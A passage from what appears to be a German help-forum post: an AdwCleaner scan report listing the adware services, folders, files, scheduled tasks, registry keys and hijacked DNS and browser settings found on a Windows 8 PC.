:: Chrome Richtlinien gelöscht
########## EOF - C:\AdwCleaner\AdwCleaner[C1].txt - [41535 Bytes] ##########
Code:
ATTFilter # AdwCleaner v5.032 - Bericht erstellt am 07/02/2016 um 22:27:38
# Aktualisiert am 31/01/2016 von Xplode
# Datenbank : 2016-02-07.2 [Server]
# Betriebssystem : Windows 8 (x64)
# Benutzername : Manz - HAUS
# Gestartet von : E:\AdwCleaner_5.032.exe
# Option : Suchlauf
# Unterstützung : hxxp://toolslib.net/forum
***** [ Dienste ] *****
Dienst Gefunden : cherimoya
Dienst Gefunden : ClaraUpdater
Dienst Gefunden : SSFK
Dienst Gefunden : DnsBlockUpdateSvc
Dienst Gefunden : MPCProtectService
Dienst Gefunden : WdMan
Dienst Gefunden : MPCKpt
Dienst Gefunden : nekydufizbt
Dienst Gefunden : qigypevozbt
Dienst Gefunden : wucotusy
Dienst Gefunden : zutuzuni
***** [ Ordner ] *****
Ordner Gefunden : C:\Program Files\SOUND+
Ordner Gefunden : C:\Program Files\{05EB6F99-463B-44CA-93A7-7C57786E2569}
Ordner Gefunden : C:\Program Files\{BBA6D671-3BA2-4BBC-9A9A-4C748AD4901E}
Ordner Gefunden : C:\Program Files\{BC760D76-4920-48C3-A3DD-6689681D1D92}
Ordner Gefunden : C:\Program Files\shopperz010220161759
Ordner Gefunden : C:\Program Files (x86)\MPC Cleaner
Ordner Gefunden : C:\Program Files (x86)\Professional Cleaning Software
Ordner Gefunden : C:\Program Files (x86)\QuickSearch
Ordner Gefunden : C:\Program Files (x86)\SecurityUtility
Ordner Gefunden : C:\Program Files (x86)\SFK
Ordner Gefunden : C:\Program Files (x86)\SearchesToYesbnd
Ordner Gefunden : C:\Program Files (x86)\B5B53C54-1454245483-E111-8F5D-B888E3A0B275
Ordner Gefunden : C:\Program Files (x86)\B5B53C54-1454247040-E111-8F5D-B888E3A0B275
Ordner Gefunden : C:\Program Files (x86)\B5B53C54-1454872248-E111-8F5D-B888E3A0B275
Ordner Gefunden : C:\Program Files (x86)\Super Great
Ordner Gefunden : C:\Program Files (x86)\{6E5909E8-3B98-4878-BF84-218A47B5BDBE}
Ordner Gefunden : C:\Program Files (x86)\{81124F8F-D6AB-4912-9F8D-54DC4E6DDE56}
Ordner Gefunden : C:\Program Files (x86)\{FC83B1F4-FC2A-4AED-BF32-D1F007D9AB1D}
Ordner Gefunden : C:\Program Files (x86)\rec_en_77
Ordner Gefunden : C:\Program Files (x86)\SpaceSondPro_v53.12571
Ordner Gefunden : C:\Program Files (x86)\Common Files\ClaraUpdater
Ordner Gefunden : C:\ProgramData\Microsoft\Windows\Start Menu\Programs\MPC
Ordner Gefunden : C:\Users\Manz\AppData\Local\BoBrowser
Ordner Gefunden : C:\Users\Manz\AppData\Local\BrowserAir
Ordner Gefunden : C:\Users\Manz\AppData\Local\DnsBlock
Ordner Gefunden : C:\Users\Manz\AppData\Local\ext_funfeedr
Ordner Gefunden : C:\Users\Manz\AppData\Local\Professional_Cleaning_Sof
Ordner Gefunden : C:\Users\Manz\AppData\Local\B5B53C54-1454249191-E111-8F5D-B888E3A0B275
Ordner Gefunden : C:\Users\Manz\AppData\Local\B5B53C54-1454273619-E111-8F5D-B888E3A0B275
Ordner Gefunden : C:\Users\Manz\AppData\Local\B5B53C54-1454875958-E111-8F5D-B888E3A0B275
Ordner Gefunden : C:\Users\Manz\AppData\Local\B5B53C54-1454881735-E111-8F5D-B888E3A0B275
Ordner Gefunden : C:\Users\Manz\AppData\Local\Temp\APN-Stub
Ordner Gefunden : C:\Users\Manz\AppData\Local\Temp\MPC
Ordner Gefunden : C:\Users\Manz\AppData\Local\Temp\Super Great
Ordner Gefunden : C:\Users\Manz\AppData\LocalLow\{D2020D47-707D-4E26-B4D9-739C4F4C2E9A}
Ordner Gefunden : C:\Users\Manz\AppData\Roaming\ASPackage
Ordner Gefunden : C:\Users\Manz\AppData\Roaming\Genius
Ordner Gefunden : C:\Users\Manz\AppData\Roaming\istartpageing
Ordner Gefunden : C:\Users\Manz\AppData\Roaming\PriceFountain
Ordner Gefunden : C:\Users\Manz\AppData\Roaming\Systweak
Ordner Gefunden : C:\Users\Manz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\ASPackage
Ordner Gefunden : C:\Users\Manz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\BrowserAir
Ordner Gefunden : C:\Users\Manz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Professional Cleaning Software
Ordner Gefunden : C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\Extensions\deskCutv2@gmail.com
Ordner Gefunden : C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\Extensions\yahooprotected@gmail.com
Ordner Gefunden : C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\6kib25c4.default\Extensions\deskCutv2@gmail.com
Ordner Gefunden : C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\6kib25c4.default\Extensions\yahooprotected@gmail.com
Ordner Gefunden : C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\Extensions\deskCutv2@gmail.com
Ordner Gefunden : C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\Extensions\yahooprotected@gmail.com
Ordner Gefunden : C:\Users\Manz\Documents\ProfessionalCleaningSoftware
Ordner Gefunden : C:\WINDOWS\Installer\{15BE6350-F697-486F-9D42-AEB6331C3B6D}
Ordner Gefunden : C:\WINDOWS\Installer\{386CE530-7A1F-4930-B6A0-12C686CC9468}
Ordner Gefunden : C:\WINDOWS\Installer\{40E468DE-4F96-445E-98FD-B843B650E95B}
Ordner Gefunden : C:\WINDOWS\Installer\{509E29BD-7FB8-4358-843B-6873FB59B15D}
Ordner Gefunden : C:\WINDOWS\SysNative\Tasks\Genius
***** [ Dateien ] *****
Datei Gefunden : C:\END
Datei Gefunden : C:\ProgramData\{262E20B8-6E20-4CEF-B1FD-D022AB1085F5}.dat
Datei Gefunden : C:\Users\Manz\AppData\Local\Chromium\User Data\Default\Local Storage\hxxp_www.palikan.com_0.localstorage
Datei Gefunden : C:\Users\Manz\AppData\Local\Chromium\User Data\Default\Local Storage\hxxp_www.palikan.com_0.localstorage-journal
Datei Gefunden : C:\Users\Manz\AppData\Local\Temp\lengine.ini.log
Datei Gefunden : C:\Users\Manz\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\BrowserAir.lnk
Datei Gefunden : C:\Users\Manz\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\BoBrowser.lnk
Datei Gefunden : C:\Users\Manz\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\BrowserAir.lnk
Datei Gefunden : C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\user.js
Datei Gefunden : C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\searchplugins\istartpageing.xml
Datei Gefunden : C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\searchplugins\yoursearching.xml
Datei Gefunden : C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\6kib25c4.default\user.js
Datei Gefunden : C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\6kib25c4.default\searchplugins\smod.xml
Datei Gefunden : C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\6kib25c4.default\searchplugins\istartpageing.xml
Datei Gefunden : C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\6kib25c4.default\searchplugins\yoursearching.xml
Datei Gefunden : C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\user.js
Datei Gefunden : C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\searchplugins\istartpageing.xml
Datei Gefunden : C:\Users\Manz\Desktop\Facebook.lnk
Datei Gefunden : C:\Users\Manz\Desktop\Youtube.lnk
Datei Gefunden : C:\Users\Manz\Desktop\BrowserAir.lnk
Datei Gefunden : C:\Users\Manz\Desktop\Sound+.lnk
Datei Gefunden : C:\Users\Public\Desktop\MPC Cleaner.lnk
Datei Gefunden : C:\WINDOWS\SysNative\roboot64.exe
Datei Gefunden : C:\WINDOWS\SysNative\DnsBlockUpdateSvc.exe
Datei Gefunden : C:\WINDOWS\SysNative\dns.block
Datei Gefunden : C:\WINDOWS\SysNative\GroupPolicy\Machine\Registry.pol
Datei Gefunden : C:\WINDOWS\SysNative\GroupPolicy\GPT.ini
Datei Gefunden : C:\WINDOWS\SysNative\drivers\cherimoya.sys
Datei Gefunden : C:\WINDOWS\SysNative\drivers\MPCKpt.sys
Datei Gefunden : C:\WINDOWS\SysNative\drivers\sdfhgdf.sys
Datei Gefunden : C:\WINDOWS\SysWOW64\dns.block
Datei Gefunden : C:\WINDOWS\SysWOW64\lavasofttcpservice.dll
Datei Gefunden : C:\WINDOWS\SysWOW64\GroupPolicy\GPT.ini
***** [ DLL ] *****
Datei Infiziert : C:\WINDOWS\SysNative\dnsapi.dll
Datei Infiziert : C:\WINDOWS\SysWOW64\dnsapi.dll
***** [ Verknüpfungen ] *****
***** [ Aufgabenplanung ] *****
Geplante Aufgabe Gefunden : Run_Bobby_Browser
Geplante Aufgabe Gefunden : Go_Palikan
Geplante Aufgabe Gefunden : crash_service
Geplante Aufgabe Gefunden : runTask
Geplante Aufgabe Gefunden : updateTask
Geplante Aufgabe Gefunden : IBUpd
Geplante Aufgabe Gefunden : Genius
Geplante Aufgabe Gefunden : Genius_Interval
Geplante Aufgabe Gefunden : ProfessionalCleaningSoftware_Popup
Geplante Aufgabe Gefunden : ProfessionalCleaningSoftware_Start
Geplante Aufgabe Gefunden : IBUpd2
Geplante Aufgabe Gefunden : Security Utility Updater
Geplante Aufgabe Gefunden : Security Utility Updater
***** [ Registrierungsdatenbank ] *****
Schlüssel Gefunden : HKCU\Software\Microsoft\Windows\CurrentVersion\App Paths\bobrowser.exe
Schlüssel Gefunden : HKCU\Software\Mozilla\Extends
Schlüssel Gefunden : HKLM\SOFTWARE\Classes\AppID\DPBHO.DLL
Schlüssel Gefunden : HKLM\SOFTWARE\Microsoft\MediaPlayer\ShimInclusionList\bobrowser.exe
Schlüssel Gefunden : HKLM\SOFTWARE\Microsoft\MediaPlayer\ShimInclusionList\BrowserAir.exe
Schlüssel Gefunden : HKLM\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates\A7BD54B233B5B2F70AF86F5BD1A0C0A772A59FC6
Schlüssel Gefunden : HKLM\SOFTWARE\MICROSOFT\SystemCertificates\Root\Certificates\D830B6B8939ACB4928401060203BB648456BB4F8
Schlüssel Gefunden : HKLM\SOFTWARE\MICROSOFT\SystemCertificates\Root\Certificates\F53E693DDABF57A88A9B12B608B09B26C0608B74
Schlüssel Gefunden : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\ProfessionalCleaningSoftware.exe
Schlüssel Gefunden : HKLM\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CERTIFICATES\26D9E607FFF0C58C7844B47FF8B6E079E5A2220E
Wert Gefunden : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run [gmsd_de_005010223]
Wert Gefunden : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run [rec_en_77]
Wert Gefunden : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run [rec_de_184]
Wert Gefunden : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run [gmsd_de_005010228]
Wert Gefunden : HKLM\SOFTWARE\Mozilla\Firefox\Extensions [deskCutv2@gmail.com]
Wert Gefunden : HKLM\SOFTWARE\Mozilla\Firefox\Extensions [yahooprotected@gmail.com]
Wert Gefunden : HKLM\SOFTWARE\Mozilla\Firefox\Extensions [{C3CD68D2-6088-4E72-BDE2-DE30DFFF4239}]
Wert Gefunden : HKLM\SOFTWARE\Mozilla\Firefox\Extensions [{63D7461E-C5DF-4012-87F0-A52D95FE9EC3}]
Schlüssel Gefunden : HKCU\Software\Google\Chrome\Extensions\jlcgehabolcakkjhgmgpkagpolbjlhfa
Schlüssel Gefunden : HKLM\SOFTWARE\Classes\AppID\{425F4ABF-B8E4-402D-9E49-06E494EB8DBF}
Schlüssel Gefunden : HKLM\SOFTWARE\Classes\AppID\{1C6F51F8-BCE6-4702-8952-6A8233359FBC}
Schlüssel Gefunden : HKCU\Software\Classes\CLSID\{17EF1FFB-0545-4C9A-BE64-78FF53338475}
Schlüssel Gefunden : HKLM\SOFTWARE\Classes\CLSID\{1AA60054-57D9-4F99-9A55-D0FBFBE7ECD3}
Schlüssel Gefunden : HKLM\SOFTWARE\Classes\CLSID\{C424171E-592A-415A-9EB1-DFD6D95D3530}
Schlüssel Gefunden : HKLM\SOFTWARE\Classes\CLSID\{C654F3FE-8E84-4BB7-87CF-8D9171FC3C73}
Schlüssel Gefunden : HKLM\SOFTWARE\Classes\CLSID\{459DD0F7-0D55-D3DC-67BC-E6BE37E9D762}
Schlüssel Gefunden : HKLM\SOFTWARE\Classes\CLSID\{7D8DAE88-BC05-4578-8C29-E541FFBA5757}
Schlüssel Gefunden : HKLM\SOFTWARE\Classes\CLSID\{11B16A3D-F03E-4565-A532-E66B219C9B0E}
Schlüssel Gefunden : HKLM\SOFTWARE\Classes\CLSID\{11B16A3D-F03E-4565-A532-E66B219C9B03}
Schlüssel Gefunden : HKLM\SOFTWARE\Classes\CLSID\{8FF10FED-2F0A-4F7F-BE87-B04F1DCD4319}
Schlüssel Gefunden : HKLM\SOFTWARE\Classes\CLSID\{7D8DAE88-BC05-4578-8C29-E541FFBA5757}
Schlüssel Gefunden : HKLM\SOFTWARE\Classes\Interface\{F2DB3739-77FB-41EB-9ED3-ABF34DF2DBF7}
Schlüssel Gefunden : HKLM\SOFTWARE\Classes\Interface\{A9582D7B-F24A-441D-9D26-450D58F3CD17}
Schlüssel Gefunden : HKLM\SOFTWARE\Classes\Interface\{EE0D8859-2ED4-4B0D-9812-16865B9AFD65}
Schlüssel Gefunden : HKLM\SOFTWARE\Classes\Interface\{296E49AA-76AE-4392-8145-A06733310DF1}
Schlüssel Gefunden : HKLM\SOFTWARE\Classes\Interface\{7307C0C7-347E-48DD-BF91-F8E74D3FE764}
Schlüssel Gefunden : HKLM\SOFTWARE\Classes\Interface\{A9582D7B-F24A-441D-9D26-450D58F3CD17}
Schlüssel Gefunden : HKLM\SOFTWARE\Classes\Interface\{EE0D8859-2ED4-4B0D-9812-16865B9AFD65}
Schlüssel Gefunden : HKLM\SOFTWARE\Classes\TypeLib\{E7BF74EE-9106-4113-B216-2F980BA29141}
Schlüssel Gefunden : HKLM\SOFTWARE\Classes\TypeLib\{14EF423E-3EE8-44AE-9337-07AC3F27B744}
Schlüssel Gefunden : HKLM\SOFTWARE\Classes\TypeLib\{14EF423E-3EE8-44AE-9337-07AC3F27B744}
Schlüssel Gefunden : HKLM\SOFTWARE\Classes\TypeLib\{CC5E6338-EB1B-4E46-8271-E691F9096452}
Schlüssel Gefunden : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{C654F3FE-8E84-4BB7-87CF-8D9171FC3C73}
Schlüssel Gefunden : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{11B16A3D-F03E-4565-A532-E66B219C9B03}
Schlüssel Gefunden : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{C424171E-592A-415A-9EB1-DFD6D95D3530}
Schlüssel Gefunden : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{C654F3FE-8E84-4BB7-87CF-8D9171FC3C73}
Schlüssel Gefunden : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{11B16A3D-F03E-4565-A532-E66B219C9B03}
Schlüssel Gefunden : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{C424171E-592A-415A-9EB1-DFD6D95D3530}
Schlüssel Gefunden : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{C654F3FE-8E84-4BB7-87CF-8D9171FC3C73}
Schlüssel Gefunden : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{11B16A3D-F03E-4565-A532-E66B219C9B03}
Wert Gefunden : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Ext\CLSID [{C654F3FE-8E84-4BB7-87CF-8D9171FC3C73}]
Schlüssel Gefunden : HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{C424171E-592A-415A-9EB1-DFD6D95D3530}
Schlüssel Gefunden : [x64] HKLM\SOFTWARE\Classes\CLSID\{C424171E-592A-415A-9EB1-DFD6D95D3530}
Schlüssel Gefunden : [x64] HKLM\SOFTWARE\Classes\CLSID\{C654F3FE-8E84-4BB7-87CF-8D9171FC3C73}
Schlüssel Gefunden : [x64] HKLM\SOFTWARE\Classes\Interface\{F2DB3739-77FB-41EB-9ED3-ABF34DF2DBF7}
Schlüssel Gefunden : [x64] HKLM\SOFTWARE\Classes\Interface\{A9582D7B-F24A-441D-9D26-450D58F3CD17}
Schlüssel Gefunden : [x64] HKLM\SOFTWARE\Classes\Interface\{EE0D8859-2ED4-4B0D-9812-16865B9AFD65}
Schlüssel Gefunden : [x64] HKLM\SOFTWARE\Classes\Interface\{296E49AA-76AE-4392-8145-A06733310DF1}
Schlüssel Gefunden : [x64] HKLM\SOFTWARE\Classes\Interface\{7307C0C7-347E-48DD-BF91-F8E74D3FE764}
Schlüssel Gefunden : [x64] HKLM\SOFTWARE\Classes\Interface\{A9582D7B-F24A-441D-9D26-450D58F3CD17}
Schlüssel Gefunden : [x64] HKLM\SOFTWARE\Classes\Interface\{EE0D8859-2ED4-4B0D-9812-16865B9AFD65}
Schlüssel Gefunden : [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{C654F3FE-8E84-4BB7-87CF-8D9171FC3C73}
Schlüssel Gefunden : [x64] HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{C424171E-592A-415A-9EB1-DFD6D95D3530}
Schlüssel Gefunden : HKCU\Software\BrowserAir
Schlüssel Gefunden : HKCU\Software\DAILYPCCLEAN
Schlüssel Gefunden : HKCU\Software\DownloadProtect
Schlüssel Gefunden : HKCU\Software\FFUPD
Schlüssel Gefunden : HKCU\Software\FunFeedr
Schlüssel Gefunden : HKCU\Software\ICSW1.17
Schlüssel Gefunden : HKCU\Software\Microsoft\Tinstalls
Schlüssel Gefunden : HKCU\Software\Mozilla\Extends
Schlüssel Gefunden : HKCU\Software\Palikan
Schlüssel Gefunden : HKCU\Software\PRODUCTSETUP
Schlüssel Gefunden : HKCU\Software\Professional Cleaning Software
Schlüssel Gefunden : HKCU\Software\ProfessionalCleaningSoftwareLanguage
Schlüssel Gefunden : HKCU\Software\Reg\Clean
Schlüssel Gefunden : HKCU\Software\SpaceSoundPro
Schlüssel Gefunden : HKCU\Software\tstamptoken
Schlüssel Gefunden : HKCU\Software\{5B8E7A09-20B5-4534-82B9-7284AA3DED94}
Schlüssel Gefunden : HKCU\Software\AppDataLow\Sams.Browser
Schlüssel Gefunden : HKLM\SOFTWARE\Clara
Schlüssel Gefunden : HKLM\SOFTWARE\FFPluginHp
Schlüssel Gefunden : HKLM\SOFTWARE\istartpageingSoftware
Schlüssel Gefunden : HKLM\SOFTWARE\MPC
Schlüssel Gefunden : HKLM\SOFTWARE\Professional Cleaning Software
Schlüssel Gefunden : HKLM\SOFTWARE\QuickSearch
Schlüssel Gefunden : HKLM\SOFTWARE\Reg\Clean
Schlüssel Gefunden : HKLM\SOFTWARE\SpaceSondPro
Schlüssel Gefunden : HKLM\SOFTWARE\Tutorials
Schlüssel Gefunden : HKLM\SOFTWARE\WdsManPro
Schlüssel Gefunden : HKLM\SOFTWARE\yessearchesSoftware
Schlüssel Gefunden : HKLM\SOFTWARE\yoursearchingSoftware
Schlüssel Gefunden : HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\BrowserAir
Schlüssel Gefunden : HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\Security utility
Schlüssel Gefunden : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ASPackage
Schlüssel Gefunden : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MPC
Schlüssel Gefunden : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Professional Cleaning Software
Schlüssel Gefunden : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SU
Schlüssel Gefunden : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\VOPackage
Schlüssel Gefunden : [x64] HKLM\SOFTWARE\BrowserAir
Schlüssel Gefunden : [x64] HKLM\SOFTWARE\BubbleSound
Schlüssel Gefunden : [x64] HKLM\SOFTWARE\SearchModule
Schlüssel Gefunden : [x64] HKLM\SOFTWARE\SOUNDPLUS
Schlüssel Gefunden : [x64] HKLM\SOFTWARE\SpaceSoundPro
Schlüssel Gefunden : [x64] HKLM\SOFTWARE\Speedchecker Limited
Schlüssel Gefunden : [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{E1527582-8509-4011-B922-29E3FB548882}_is1
Schlüssel Gefunden : [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SOUNDPLUS
Schlüssel Gefunden : HKU\.DEFAULT\Software\{5B8E7A09-20B5-4534-82B9-7284AA3DED94}
Schlüssel Gefunden : HKU\S-1-5-19\Software\{5B8E7A09-20B5-4534-82B9-7284AA3DED94}
Schlüssel Gefunden : HKU\S-1-5-20\Software\{5B8E7A09-20B5-4534-82B9-7284AA3DED94}
Schlüssel Gefunden : HKU\S-1-5-21-2229505580-413648313-3343944023-1002\Software\BrowserAir
Schlüssel Gefunden : HKU\S-1-5-21-2229505580-413648313-3343944023-1002\Software\DAILYPCCLEAN
Schlüssel Gefunden : HKU\S-1-5-21-2229505580-413648313-3343944023-1002\Software\DownloadProtect
Schlüssel Gefunden : HKU\S-1-5-21-2229505580-413648313-3343944023-1002\Software\FFUPD
Schlüssel Gefunden : HKU\S-1-5-21-2229505580-413648313-3343944023-1002\Software\FunFeedr
Schlüssel Gefunden : HKU\S-1-5-21-2229505580-413648313-3343944023-1002\Software\ICSW1.17
Schlüssel Gefunden : HKU\S-1-5-21-2229505580-413648313-3343944023-1002\Software\Microsoft\Tinstalls
Schlüssel Gefunden : HKU\S-1-5-21-2229505580-413648313-3343944023-1002\Software\Mozilla\Extends
Schlüssel Gefunden : HKU\S-1-5-21-2229505580-413648313-3343944023-1002\Software\Palikan
Schlüssel Gefunden : HKU\S-1-5-21-2229505580-413648313-3343944023-1002\Software\PRODUCTSETUP
Schlüssel Gefunden : HKU\S-1-5-21-2229505580-413648313-3343944023-1002\Software\Professional Cleaning Software
Schlüssel Gefunden : HKU\S-1-5-21-2229505580-413648313-3343944023-1002\Software\ProfessionalCleaningSoftwareLanguage
Schlüssel Gefunden : HKU\S-1-5-21-2229505580-413648313-3343944023-1002\Software\Reg\Clean
Schlüssel Gefunden : HKU\S-1-5-21-2229505580-413648313-3343944023-1002\Software\SpaceSoundPro
Schlüssel Gefunden : HKU\S-1-5-21-2229505580-413648313-3343944023-1002\Software\tstamptoken
Schlüssel Gefunden : HKU\S-1-5-21-2229505580-413648313-3343944023-1002\Software\{5B8E7A09-20B5-4534-82B9-7284AA3DED94}
Schlüssel Gefunden : HKU\S-1-5-21-2229505580-413648313-3343944023-1002\Software\AppDataLow\Sams.Browser
Schlüssel Gefunden : HKU\S-1-5-21-2229505580-413648313-3343944023-1002\Software\Microsoft\Windows\CurrentVersion\Uninstall\BrowserAir
Schlüssel Gefunden : HKU\S-1-5-21-2229505580-413648313-3343944023-1002\Software\Microsoft\Windows\CurrentVersion\Uninstall\Security utility
Schlüssel Gefunden : HKCU\Software\Microsoft\Internet Explorer\InternetRegistry\REGISTRY\USER\S-1-5-21-2229505580-413648313-3343944023-1002\Software\DownloadProtect
Schlüssel Gefunden : HKCU\Software\Microsoft\Internet Explorer\InternetRegistry\REGISTRY\USER\S-1-5-21-2229505580-413648313-3343944023-1002\Software\shopperz010220161759
Schlüssel Gefunden : HKCU\Software\Microsoft\Internet Explorer\InternetRegistry\REGISTRY\USER\S-1-5-21-2229505580-413648313-3343944023-1002\Software\{5B8E7A09-20B5-4534-82B9-7284AA3DED94}
Schlüssel Gefunden : HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{015DB5FA-EAFB-4592-A95B-F44D3EE87FA9}
Schlüssel Gefunden : HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{140E657E-89B5-411B-951A-24698B1E79EF}
Daten Gefunden : HKCU\Software\Microsoft\Internet Explorer\SearchScopes [DefaultScope] - {140E657E-89B5-411B-951A-24698B1E79EF}
Schlüssel Gefunden : HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{31E15B1A-A8DD-4EE8-B691-0B5EF63443F3}
Schlüssel Gefunden : [x64] HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{140E657E-89B5-411B-951A-24698B1E79EF}
Schlüssel Gefunden : [x64] HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{6586d803-df30-46d3-a89a-4136c8571d45}
Schlüssel Gefunden : HKU\S-1-5-21-2229505580-413648313-3343944023-1002\Software\Microsoft\Internet Explorer\SearchScopes\{015DB5FA-EAFB-4592-A95B-F44D3EE87FA9}
Schlüssel Gefunden : HKU\S-1-5-21-2229505580-413648313-3343944023-1002\Software\Microsoft\Internet Explorer\SearchScopes\{140E657E-89B5-411B-951A-24698B1E79EF}
Daten Gefunden : HKU\S-1-5-21-2229505580-413648313-3343944023-1002\Software\Microsoft\Internet Explorer\SearchScopes [DefaultScope] - {140E657E-89B5-411B-951A-24698B1E79EF}
Schlüssel Gefunden : HKU\S-1-5-21-2229505580-413648313-3343944023-1002\Software\Microsoft\Internet Explorer\SearchScopes\{31E15B1A-A8DD-4EE8-B691-0B5EF63443F3}
Daten Gefunden : HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{0384D9E4-6354-47BD-B63F-154E6D937972} [NameServer] - 104.197.191.4
Daten Gefunden : HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{96CC4FD2-7AB2-4A4F-B6CB-52F22B8E3A50} [NameServer] - 104.197.191.4
Daten Gefunden : HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{97e1de57-d6fa-11e1-be62-806e6f6e6963} [NameServer] - 104.197.191.4
Daten Gefunden : HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{C02CAB3E-C922-4371-A1DD-E72CF76EF979} [NameServer] - 104.197.191.4
Daten Gefunden : HKLM\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{0384D9E4-6354-47BD-B63F-154E6D937972} [NameServer] - 104.197.191.4
Daten Gefunden : HKLM\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{96CC4FD2-7AB2-4A4F-B6CB-52F22B8E3A50} [NameServer] - 104.197.191.4
Daten Gefunden : HKLM\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{97e1de57-d6fa-11e1-be62-806e6f6e6963} [NameServer] - 104.197.191.4
Daten Gefunden : HKLM\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{C02CAB3E-C922-4371-A1DD-E72CF76EF979} [NameServer] - 104.197.191.4
Schlüssel Gefunden : HKCU\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\terraclicks.com
Schlüssel Gefunden : HKCU\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\tradeadexchange.com
Schlüssel Gefunden : HKCU\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\www-searching.com
Wert Gefunden : HKCU\Software\Microsoft\Windows\CurrentVersion\Run [Security Utility]
Wert Gefunden : [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run [3D BubbleSound]
Wert Gefunden : [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run [Sound+]
Wert Gefunden : [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run [SpaceSoundPro]
Wert Gefunden : [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run [IDSCPRODUCT]
Wert Gefunden : HKU\S-1-5-21-2229505580-413648313-3343944023-1002\Software\Microsoft\Windows\CurrentVersion\Run [Security Utility]
Wert Gefunden : HKU\S-1-5-21-2229505580-413648313-3343944023-1002\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run [SearchModule]
Wert Gefunden : HKU\S-1-5-21-2229505580-413648313-3343944023-1002\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run [Security Utility]
Schlüssel Gefunden : HKLM\SOFTWARE\Classes\DPBHO.DownloadProtect
Schlüssel Gefunden : HKLM\SOFTWARE\Classes\DPBHO.DownloadProtect.1
***** [ Internetbrowser ] *****
[C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\prefs.js] [Preference] Gefunden : user_pref("browser.newtab.url", "chrome://quick_start/content/index.html");
